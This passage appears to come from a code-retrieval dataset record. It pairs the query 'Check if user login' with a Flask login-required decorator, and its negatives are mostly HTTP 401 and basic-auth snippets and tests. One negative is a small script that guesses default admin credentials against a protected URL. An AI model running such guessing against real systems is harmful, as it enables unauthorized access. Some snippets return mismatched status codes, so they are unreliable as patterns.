_respond_unauthorized(self, request, message=\"Unauthorized\"):\n resp = Response()\n resp.status = 401\n resp.headers = self.forget(request.environ, {})\n resp.content_type = \"text/plain\"\n resp.body = message\n request.environ[\"repoze.who.application\"] = resp\n return None", "def authenticate():\n resp = {\"status\": 401, \"message\": \"Could not verify your access level for that URL\"}\n return Response(dumps(resp), status=404, mimetype='application/json')", "def hidden_basic_auth(user=\"user\", passwd=\"passwd\"):\n\n if not check_basic_auth(user, passwd):\n return status_code(404)\n return jsonify(authenticated=True, user=user)", "def CR_authentication():\n \n # create a random 10 character string\n choices = string.letters + string.digits + string.punctuation;\n randomString = ''.join(random.choice(choices) for i in range(10))\n session['challenge'] = randomString\n \n return Response('Access failed.', 401, {'WWW-Authenticate': str.format('Basic realm=\\\"Protected iStreet event data; Challenge: {0}\\\"', randomString)})", "def authenticate():\n return Response(\n '''Login Required - email acaceres@0-sec.net for access or DM him @_hyp3ri0n on Twitter. Please do so from a corporate email or\n with some kind of proof that you are a security engineer, academic, or need this data for research purposes (e.g. email from a corporate or .edu email or provide\n a linkedin or twitter account showing as much)\n You have to login with proper credentials''', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required - email acaceres@0-sec.net for access or DM him @_hyp3ri0n on Twitter. Please do so from a corporate email or with some kind of proof that you are a security engineer, academic, or need this data for research purposes (e.g. email from a corporate or .edu email or provide a linkedin or twitter account showing as much)\"'})", "def auth_failure():\n return \"Request denied due to failed authorization\", 201, {'Content-Type': 'text/html'}", "def unauthorized(self, error):\n return jsonify({'error': \"NOT AUTHORIZED\"}), 401", "def _handle_authentication_error(self):\n response = make_response('Access Denied')\n response.headers['WWW-Authenticate'] = self.auth.get_authenticate_header()\n response.status_code = 401\n return response", "def authenticate():\n\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n get_auth_headers())", "def test_unauthorized_exception(exception_app):\n request, response = exception_app.test_client.get('/401')\n assert response.status == 401\n\n request, response = exception_app.test_client.get('/401/basic')\n assert response.status == 401\n assert response.headers.get('WWW-Authenticate') is not None\n assert response.headers.get('WWW-Authenticate') == \"Basic realm='Sanic'\"\n\n request, response = exception_app.test_client.get('/401/digest')\n assert response.status == 401\n\n auth_header = response.headers.get('WWW-Authenticate')\n assert auth_header is not None\n assert auth_header.startswith('Digest')\n assert \"qop='auth, auth-int'\" in auth_header\n assert \"algorithm='MD5'\" in auth_header\n assert \"nonce='abcdef'\" in auth_header\n assert \"opaque='zyxwvu'\" in auth_header\n\n request, response = exception_app.test_client.get('/401/bearer')\n assert response.status == 401\n assert response.headers.get('WWW-Authenticate') == \"Bearer\"", "def display_401(error):\n return render_template('/error401.html'), 401", "def test_unauthorized(self):\n 
self._error_test(fitbit_exceptions.HTTPUnauthorized)", "def basic_auth(user=\"user\", passwd=\"passwd\"):\n\n if not check_basic_auth(user, passwd):\n return status_code(401)\n\n return jsonify(authenticated=True, user=user)", "def test_unauthenticated_request(self):\n url = self.get_url(self.active_user.id)\n response = self.client.get(url)\n\n expected_status_code = 401\n self.assertEqual(response.status_code, expected_status_code)", "def basic_http_auth(f):\n def wrap(request, *args, **kwargs):\n if request.META.get('HTTP_AUTHORIZATION', False):\n authtype, auth = request.META['HTTP_AUTHORIZATION'].split(' ')\n auth = base64.b64decode(auth)\n username, password = auth.split(':')\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return f(request, *args, **kwargs)\n else:\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n \n return wrap", "def auth_error():\n return unauthorized('Invalid credentials')", "def require_http_auth(request):\n\n if http_auth_allowed(request) and not request.user.is_authenticated:\n site = get_current_site(request)\n response = HttpResponse(status=401)\n response['WWW-Authenticate'] = (\n 'Basic realm=\"{}\", charset=\"UTF-8\"'.format(site.name)\n )\n # Check whether the client supports cookies.\n response.set_cookie('testcookie', '1', secure=(not settings.DEBUG),\n httponly=True, samesite='Lax')\n return response\n else:\n raise PermissionDenied()", "def response_401(description=None):\n resp_def = dict(util.RESPONSE_404)\n if description is not None:\n resp_def['description'] = description\n\n return response(401, resp_def)", "def http_basic_auth():\n users = ['administrator', 'admin']\n passwords = ['administrator', 'admin']\n protectedResource = 'http://localhost/secured_path'\n foundPass = False\n for user in users:\n if foundPass:\n break\n for passwd in passwords:\n encoded = base64.encodestring(user + ':' + passwd)\n response = requests.get(protectedResource, auth=(user, passwd))\n if response.status_code != 401:\n print('User Found!')\n print('User: %s, Pass: %s' % (user, passwd))\n foundPass = True\n break", "def assertHttpUnauthorized(self, resp):\r\n return self.assertEqual(resp.status_code, 401)", "def basic_auth_required(view_func):\n # http://djangosnippets.org/snippets/448/\n def _auth(request, *args, **kwargs):\n if 'HTTP_AUTHORIZATION' in request.META:\n auth = request.META['HTTP_AUTHORIZATION'].split()\n if len(auth) == 2:\n if auth[0].lower() == \"basic\":\n uname, passwd = base64.b64decode(auth[1]).split(':')\n user = authenticate(username=uname, password=passwd)\n if user is not None:\n if user.is_active:\n return view_func(request, *args, **kwargs)\n response = HttpResponse(\"Authorization Required\", status=401)\n response['WWW-Authenticate'] = 'Basic realm=\"Secure Area\"'\n return response\n return _auth", "def http_basic_auth(func):\r\n\t@wraps(func)\r\n\tdef _decorator(request, *args, **kwargs):\r\n\r\n\t\tif request.META.has_key('HTTP_AUTHORIZATION'):\r\n\t\t\ttry:\r\n\t\t\t\tauthmeth, auth = request.META['HTTP_AUTHORIZATION'].split(' ', 1)\r\n\t\t\t\tif authmeth.lower() == 'basic':\r\n\t\t\t\t\tauth = auth.strip().decode('base64')\r\n\t\t\t\t\tusername, password = auth.split(':', 1)\r\n\t\t\t\t\tuser = authenticate(username=username, 
password=password)\r\n\r\n\t\t\t\t\tif user:\r\n\r\n\t\t\t\t\t\tlogin(request, user)\r\n\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\r\n\t\t\t\t\t\treturn HttpResponseForbidden()\r\n\r\n\t\t\texcept ValueError:\r\n\t\t\t\t# Bad HTTP_AUTHORIZATION header\r\n\t\t\t\treturn HttpResponseForbidden()\r\n\t\t\t\t\r\n\t\treturn func(request, *args, **kwargs)\r\n\treturn _decorator", "def unauthorized(self, message=None):\n return self.send_message(message, status=401)", "def basic_auth_required(fn):\n @wraps(fn)\n def _wrapper(request, *args, **kwargs):\n authentication = request.headers.get('Authentication', None)\n\n if authentication:\n if not authentication.startswith(\"Basic \"):\n request.response.status = 401\n\n return {\n 'error': \"Authentication failed!\"\n }\n\n auth_data = authentication[6:]\n\n try:\n username, password = base64.urlsafe_b64decode(auth_data).decode(\"UTF8\").split(\":\")\n\n user = request.dbsession.query(User).filter(\n User.email == username\n ).one()\n\n if user.is_password(password.encode(\"UTF8\")):\n return fn(request, *args, **kwargs)\n except (ValueError, NoResultFound):\n pass\n\n request.response.status = 401\n\n return {\n 'error': 'Authentication failed!'\n }\n\n return _wrapper", "def test_user_get_failure_using_basic_auth(self):\n # setup\n user = self.generate_username_password()\n resp = self.create_user(user)\n resp_body = resp.json()\n try:\n assert resp.status_code == 201\n assert resp.headers[\"Content-Type\"] == \"application/json; charset=utf-8\"\n assert resp_body[\"username\"] == user[\"userName\"]\n assert resp_body[\"userID\"] != \"\"\n except AssertionError:\n raise\n finally:\n self.pprint_request(resp.request)\n self.pprint_response(resp)\n uuid_ = str(uuid.uuid4())\n\n # test\n resp2 = self.get_user_basic_auth(uuid_, user)\n resp_body2 = resp2.json()\n assert resp2.status_code == 401\n assert resp2.headers[\"Content-Type\"] == \"application/json; charset=utf-8\"\n assert resp_body2[\"code\"] == \"1207\"\n assert resp_body2[\"message\"] == \"User not found!\"\n\n # teardown:\n resp3 = self.delete_user_basic_auth(resp_body[\"userID\"], user)\n try:\n assert resp3.status_code == 204\n except AssertionError:\n raise\n finally:\n self.pprint_request(resp3.request)\n self.pprint_response(resp3)", "def test_unhappy_path_unauthorized(self):\n\n response = self.client.get(self.url)\n expected_data = {\"detail\": \"Authentication credentials were not provided.\"}\n\n self.assertDictEqual(response.data, expected_data)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_no_auth(self):\n url = 'https://domain.com/project/objects.inv'\n expected = 'https://domain.com/project/objects.inv'\n actual = _strip_basic_auth(url)\n assert expected == actual", "def test_unauthorized_access(flask_test_client, http_method, endpoint):\n response = flask_test_client.open(\n method=http_method, path=endpoint, headers=get_headers()\n )\n assert response.status == \"401 UNAUTHORIZED\"\n assert response.content_type == \"application/json\"\n assert response.json[\"message\"] == \"Access token is invalid or expired.\"", "def test_get_unauthenticated(self):\n del self.client.request_kwargs['auth']\n self.verify_get_response(self.client.get(STATUS_PATH))", "def get_authenticate_header(self):\n return f'Basic realm=\"{self.www_authenticate_realm}\"'", "def test_retrieve_user_unauthorized(self):\r\n res = self.client.get(ME_URL)\r\n\r\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def basic_header(self):\n self.auth = 
base64.encodestring('%s:%s' % (self.username, self.password)).replace('\\n', '')\n return { \n #\"Authorization\" : \"Basic %s\" % self.auth, \n \"Content-type\": \"text/plain\" }", "def test_retrieve_unauthorized_user(self):\n\n response = self.client.get(URL_ME)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_user_unauthorized(self):\n res = self.client.get(ME_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_user_unauthorized(self):\n res = self.client.get(ME_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def challenge_view(self, request):\n headerlist = [(\"Content-Type\", \"text/plain\")]\n headerlist.extend(self._get_challenge_headers(request))\n return Response(\"Unauthorized\", status=\"401 Unauthorized\",\n headerlist=headerlist)", "def denied_response(self, req):\n if req.remote_user:\n return HTTPForbidden(request=req)\n else:\n return HTTPUnauthorized(request=req)", "def test_401_unauthorized(app, client):\n\n @app.route(\"/401\")\n def unauthorized():\n abort(401)\n\n response = client.get(\"/401\")\n assert response.status_code == 401\n assert \"401 Unauthorized\" in str(response.data)", "def test_status_unauthenticated(self):\n rv = self.client.post('/statusize/', data={'message': 'foo'},\n follow_redirects=True)\n eq_(rv.status_code, 403)", "def test_call_unauthenticated(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(401)\n with self.assertRaises(APIError):\n data = client.call(**self.build_parameters)", "def test_unhappy_path_unauthorized(self):\n\n response = self.client.post(self.url)\n expected_data = {\"detail\": \"Authentication credentials were not provided.\"}\n\n self.assertDictEqual(response.data, expected_data)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_users_unauthorized(setup_client):\n client = setup_client\n res = client.get(ME_URL)\n assert res.status_code == status.HTTP_401_UNAUTHORIZED", "def __call__(self, resp):\r\n if not self.auth_token:\r\n self.auth()\r\n resp.register_hook('response', self.handle_error)\r\n resp.headers['X-Auth-Token'] = self.auth_token\r\n return resp", "def _handle_401(self, response, **kwargs):\n if not response.status_code == 401 and not response.status_code == 403:\n return response\n\n # Free the original connection\n response.content\n response.close()\n\n # copy the request to resend\n newreq = response.request.copy()\n\n self._access_token = None\n self._logger.debug(\"_handle_401, cleared _access_token, retrying with new token\")\n\n newreq.headers[\"Authorization\"] = self._get_auth_value()\n\n _response = response.connection.send(newreq, **kwargs)\n _response.history.append(response)\n _response.request = newreq\n\n return _response" ]
[ "0.8093736", "0.80926424", "0.7958403", "0.7852648", "0.7843114", "0.7824419", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.776624", "0.7754693", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.771945", "0.7667712", "0.7664151", "0.76493174", "0.7613103", "0.7591923", "0.74499536", "0.74152935", "0.7389793", "0.73102117", "0.72994584", "0.70069116", "0.6989699", "0.6985984", "0.69489896", "0.69403917", "0.69043815", "0.6843354", "0.6842244", "0.6816229", "0.67638755", "0.6701405", "0.6700694", "0.6666637", "0.66607744", "0.66428447", "0.66164446", "0.66088307", "0.6551196", "0.6548378", "0.64217687", "0.6410419", "0.6393135", "0.6381609", "0.6327866", "0.629943", "0.6287014", "0.62427884", "0.6242011", "0.6230159", "0.62130815", "0.6168915", "0.61408406", "0.6088527", "0.60420007", "0.6041198", "0.6029272", "0.6020013", "0.601565", "0.5991479", "0.59679294", "0.5945756", "0.59284157", "0.59284157", "0.5922706", "0.59027636", "0.58849794", "0.58700204", "0.58687663", "0.5866924", "0.58479726", "0.58452344", "0.5829068" ]
0.76140213
41
Check if no user login
def require_visitor(func): @wraps(func) def decorator(*args, **kwargs): if g.user: return redirect(url_for('site.home')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_user_and_login(self) -> Response:\n pass", "def check_auth_none(self, username):\n return AUTH_FAILED", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def validUser(self):\n if self.state == SessionStates.LOGGED_OUT:\n return False\n\n # if self.user == None:\n # return False\n return True", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def test_non_existing_user_login(self):\n user = {\n 'email': 'test@gmail.com',\n 'password': 'password123'}\n res = self.app.post('/login', data=user)\n self.assertEqual(res.status_code, 200)\n self.assertIn(\"You have no account\", str(res.data))", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def check_login(request, username=None):\r\n if request.user is None:\r\n return False\r\n\r\n # if we have a username we're told to check against, make sure the\r\n # username matches\r\n if username is not None and username != request.user.username:\r\n return False\r\n\r\n return True", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def test_username_not_exist(self):\n\n url_extend = 'user_auth/login/'\n # get the first input button under the first form in login page.\n username = 'usersomerandomeuser'\n password = 'user'\n login_button = login(self.browser, self.url + url_extend, username, password)\n try:\n login_button.click()\n except:\n raise Exception(\"Login Error!\")\n\n ## check the current url\n assert self.browser.current_url == self.url + url_extend", "def test_not_authenticated(self):\n self.client.logout()\n response = self._get(get_kwargs=self._data())\n self._check_response(response, 101)\n self.assertEqual(UserFitbit.objects.count(), 1)", "def __check_user_exist(self):\n\n login_form = self.login_form()\n\n user = User.query.filter_by(username=login_form.username.data).first()\n if user is None or not user.get_password(login_form.password.data):\n flash('Invalid username or password') # TODO: flash in Template hinzufuegen\n return redirect(url_for('login'))\n\n login_user(user, remember=login_form.remember_me.data)\n\n next_page = request.args.get('next')\n\n # if 'next' is found and the host is specified\n # it will redirect\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)", "def is_correct_user(self, login, password):\n pass", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def has_user(self):\n\t\treturn len( self.a_token ) > 0 and len( self.a_secret ) > 0", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def can_log_in_without_cas(self):\n return self.password is not None and self.password != \"\"", "def test_non_user_login(self):\n self.user.list_of_accounts = [{'username': 'Parseen',\n 'pwd': 'mypassword',\n 'email': 'david.parseen@yahoo.com'}]\n msg = self.user.login(\"nonuser@yahoo.com\", \"idontevenhaveone\")\n self.assertEqual(msg, \"Account not registered, sign up\")", "def test_login_route_no_user(self):\n result = self.client.post(\"/login\",\n data={\"username\":\"test_user2\", \"password\":\"test_pass1\"}, follow_redirects=True)\n 
self.assertEqual(result.status_code, 200)\n self.assertIn(b\"Looks like you have not made an account yet!\", result.data)", "def check_if_should_always_be_logged_in(connection,username_log):\r\n with connection:\r\n c = connection.execute(SELECT_USER_BY_LOGIN_PREVILAGES, (username_log,))\r\n return c.fetchone()", "def test_nonexistent_user(self):\n self.client.login(username=self.global_staff.username, password=self.password)\n resp = self.client.get(self.get_url('IDoNotExist'))\n assert resp.status_code == status.HTTP_404_NOT_FOUND", "def is_logged_in():\n return 'user' in session", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_login_no_user(self):\n post_data = client.post(LOGIN_URL, json=self.post_data1)\n self.assertEqual(post_data.status_code, 401)\n self.assertEqual(post_data.get_json()[\"msg\"], \"Incorrect username.\")", "def check_auth():", "def check_user(user):\n result_user = search_column_with_constraint(choose_database(\"auth\"), \"users\", \"id\", \"id\", user)\n # result_user = search_single_entry(choose_database(\"auth\"), \"users\", \"id\", user)\n\n if len(result_user) == 0:\n return 0\n else:\n return 1", "def test_login_for_user_not_registered(self):\n response = self.client.post(LOGIN_URL,\n data=json.dumps(\n {'username': 'otieno', 'password': 'otieno254'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 404)\n result = json.loads(response.data.decode())\n self.assertEqual(result['message'], 'User unavailable')", "def test_no_user(self):\n self.request.user = None\n result = user_id_get_view(self.request)['d']\n self.assertEqual(result, error_dict('api_errors', 'not authenticated for this request'))", "def is_regular_user(user):\n return user.is_authenticated()", "def invalid_user(self, username):\n con = dbcon()\n cur = con.cursor()\n cur.execute(\"SELECT * FROM my_users WHERE username=%(username)s\",\\\n {'username':username})\n rows = cur.rowcount\n if rows > 0:\n return True\n return False", "def is_logged_in(self) -> bool:\n return self.id is not None and self.username is not None", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def 
test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def logged_in(self):\n return self.user is not None", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def is_user(self, user='') -> int:\n try:\n if user in self.users:\n return(1)\n else:\n return(0)\n except Exception as error:\n print(f\"Error: self.is_user({user}) -> {error}\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def has_user(self, user): # pylint: disable=unused-argument\r\n return False", "def user_exists(self, login):\n\t\tif login in self.users_by_name and isinstance(self.users_by_name[login], VDOM_user):\n\t\t\treturn True\n\t\treturn False", "def _check_auth(self):\n if self.authToken:\n return True\n else:\n msg = \"you need to login\"\n self.raise_error(msg)", "def has_username(self):\n return self.username is not None", "def test_returns_none_if_no_user(self):\r\n self.assertIsNone(PasswordlessAuthenticationBackend().get_user('edith@example.com'))", "def check_authentication():\r\n\r\n #TODO: Reservation based authentication\r\n try:\r\n authenticated_user()\r\n except Exception as e:\r\n return e\r\n\r\n return True", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def user_in_session():\n return 'user_id' in login_session", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? 
AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def login_user():\n pass", "def check():\n # Sets variable username to username inputed by user\n username = request.args.get(\"username\")\n # Selects userid from username inputed by user (if there is one)\n userinfo = db.execute(\"SELECT * FROM users WHERE username = :username\", username=username)\n # If there is no info on the username inputed, that means username is not taken, and user can take the username\n if not userinfo:\n # Return true for the username is not taken\n return jsonify(True)\n # Return false if there is info on the username (meaning it was taken)\n return jsonify(False)", "def test_login_login_inexisting_user_false(self):\n logins = {\n \"Email\": \"user@example.com\",\n \"Password\": \"pass1234\"\n }\n resp = self.client().post('/api/v1/auth/login', data=logins)\n self.assertEqual(resp.status_code, 400)\n resp = resp.get_json()\n self.assertEqual(resp['error'],\n 'User not found in our database')", "def is_logged_in():\n logged_in = \"uid\" in session\n if logged_in:\n user = api.user.get_user(uid=session[\"uid\"])\n if not user or (user.get(\"disabled\", False) is True):\n logout()\n return False\n return logged_in", "def is_logged(html):\n soup = BeautifulSoup(html, \"html.parser\")\n\n if soup.find('div', {'id': 'user_information'}) is None:\n return False\n return True", "def test_no_user_exists(self):\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {})", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def is_new_user_service(uid):\n user = user_dao.get_user_by_uid_dao(uid)\n return user is None", "def logged_in(request):\n return request.current_user is not None", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def is_logged_in(self):\n return self.router.token is not None", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def test_get_user_non_exist_id(self):\n print('(' + 
self.test_get_user_non_exist_id.__name__+')',\n self.test_get_user_non_exist_id.__doc__)\n self.assertIsNone(self.connection.get_user(NON_EXIST_PATIENT_USERNAME))", "def test_nonexistent_user_login(self):\n\n fake_user = {\"email\": \"eat@me.com\",\n \"password\": \"lolzIKid\"}\n\n res = self.client.post(\n \"/api/v2/auth/login\", data=json.dumps(fake_user), content_type=\"application/json\")\n result = json.loads(res.data)\n self.assertEqual(result[\"Error\"], \"User does not exist\")\n self.assertEqual(res.status_code, 404)", "def _has_data(cls):\n return User.objects.count() > 0", "def checkLogin(self):\n if self._thread:\n return False\n\n try:\n return self._checkLogin()\n except Exception:\n self.expired = True\n self.finished = True\n\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def is_logged_in():\n _has_cookie = util.web.has_cookie('pass')\n if _has_cookie:\n _is_expired = util.web.is_cookie_expired('pass')\n if _is_expired:\n return False\n return True\n return False", "def is_user(username: str) -> bool:\n db = get_db()\n if username is None:\n return False\n return not db.get_user_by_name(username) is None", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def is_logged_in(self):\n return self.cookie is not None", "def test_login_missing_username(self):\n resp = self.client.post(\n reverse('login'),\n json.dumps({\n \"password\": \"pass\",\n }),\n content_type=\"application/json\"\n )\n assert resp.status_code == 400, resp.content.decode('utf-8')\n assert not self.is_authenticated(self.user)", "def is_anonymous():\n return False", "def check_for_user_not_in_system(player_name: str) -> bool:\n\n for uid, user in self.connected_users.items():\n if user['authorized'] and user['main']['player_name'] == player_name:\n return False\n return True", "def test_non_registered_user_trying_to_login(self): \n # try logging in the user without registering the user \n res = self.client().post(AuthTestCase.login, data=self.user)\n # bad request \n self.assertEqual(res.status_code, 401)", "def no_network_access_check(user):\n return not user.has_property(\"network_access\")", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = 
self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def _checkUserExists(username,self):\r\n \r\n exists = False\r\n \r\n if _findUser(username) is not None:\r\n exists = True\r\n \r\n return exists", "def check(self):\n\n us = ServiceLocator.resolve(ServiceLocator.USERS)\n\n user_session = self.get()\n user = self.get_user()\n\n return user is not None and us.verify_auth_token(user_session.token, config.SESSION_EXPIRES)", "def testGetUserWithoutData(self):\n self.store.commit()\n with login(u'fluiddb', self.admin.objectID, self.transact) as session:\n deferred = self.facade.getUser(session, u'unknown')\n error = yield self.assertFailure(deferred, TNoSuchUser)\n self.assertEqual(u'unknown', error.name)", "def is_user_present(self, username): # WORKS\n done = self.cur.execute(\"SELECT username FROM users WHERE username = \\\"{}\\\"\".format(username))\n if done == 1:\n return True\n else:\n return False", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def testNoPermission(self):\n self.login_user(self.user)\n response = self.client.get(self.url, self.args)\n self.assertEqual(response.status_code, 302)", "def user_logged_in():\n if not session.get('user_id'):\n return \"nope\", 401\n else:\n return \"yep\", 200" ]
[ "0.7631167", "0.7377581", "0.7348826", "0.7320364", "0.72438157", "0.7098895", "0.70730084", "0.70391387", "0.6981259", "0.6977111", "0.6969315", "0.6933913", "0.69154346", "0.6907214", "0.6865833", "0.6815512", "0.6799823", "0.67882526", "0.67734057", "0.67627156", "0.670679", "0.66872627", "0.6678289", "0.6670774", "0.66642874", "0.66642874", "0.66642874", "0.66642874", "0.6658266", "0.6647678", "0.66453034", "0.6643202", "0.6614826", "0.66104454", "0.6610254", "0.6607496", "0.6599286", "0.6599286", "0.6596498", "0.65961397", "0.65958214", "0.6589427", "0.6584934", "0.65828604", "0.65828604", "0.6580714", "0.6571355", "0.6569671", "0.6567775", "0.65668136", "0.6552768", "0.6536445", "0.65211916", "0.6520104", "0.6495194", "0.64897794", "0.6488937", "0.6485867", "0.64820725", "0.6480279", "0.64787126", "0.64693314", "0.64597744", "0.64550805", "0.64550805", "0.64550805", "0.64550805", "0.6442284", "0.64394444", "0.643134", "0.6420422", "0.6419667", "0.63987947", "0.63966054", "0.6391801", "0.6389647", "0.6385969", "0.6379187", "0.6373667", "0.6351344", "0.634396", "0.634396", "0.634396", "0.634396", "0.63412654", "0.63407344", "0.63357306", "0.6333855", "0.6332498", "0.6325428", "0.632134", "0.632134", "0.632134", "0.6314297", "0.6311178", "0.63093805", "0.63085514", "0.63066286", "0.62943804", "0.6292416", "0.6289367" ]
0.0
-1
Check if user login
def require_user(func): @wraps(func) def decorator(*args, **kwargs): if not g.user: # flash('This operation requires a logged-in account') return render_template('account/error.html', error='Sorry, you are not authorized to perform this operation!') # return redirect(url_for('site.login')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
